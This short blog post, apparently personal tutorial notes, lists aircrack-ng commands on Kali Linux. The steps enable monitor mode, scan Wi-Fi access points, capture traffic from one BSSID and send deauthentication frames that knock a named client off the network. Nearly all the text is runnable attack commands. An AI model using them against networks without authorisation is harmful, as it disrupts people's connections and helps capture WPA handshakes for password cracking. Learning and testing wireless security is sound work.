Kali WIFI Test

1. start the monitor mode(exit with stop)

sudo airmon-ng start wlan0

2.check monitor status

sudo ifconfig

3.scan wifi ap

sudo airodump-ng wlan0mon 

4.scan clients from the AP, -c is channel, --bssid is the MAC

sudo airodump-ng wlan0mon -c 1 --bssid DC:D8:7C:07:94:01 -w wpa

5.-0 is deauthentication hack, 5 times, -a is AP's MAC, -c is client MAC,

sudo aireplay-ng -0 5 -a DC:D8:7C:07:94:01 -c 92:33:76:5F:E6:EA wlan0mon

posted @ 2020-11-10 14:26  Windows 10  阅读(79)  评论(0编辑  收藏  举报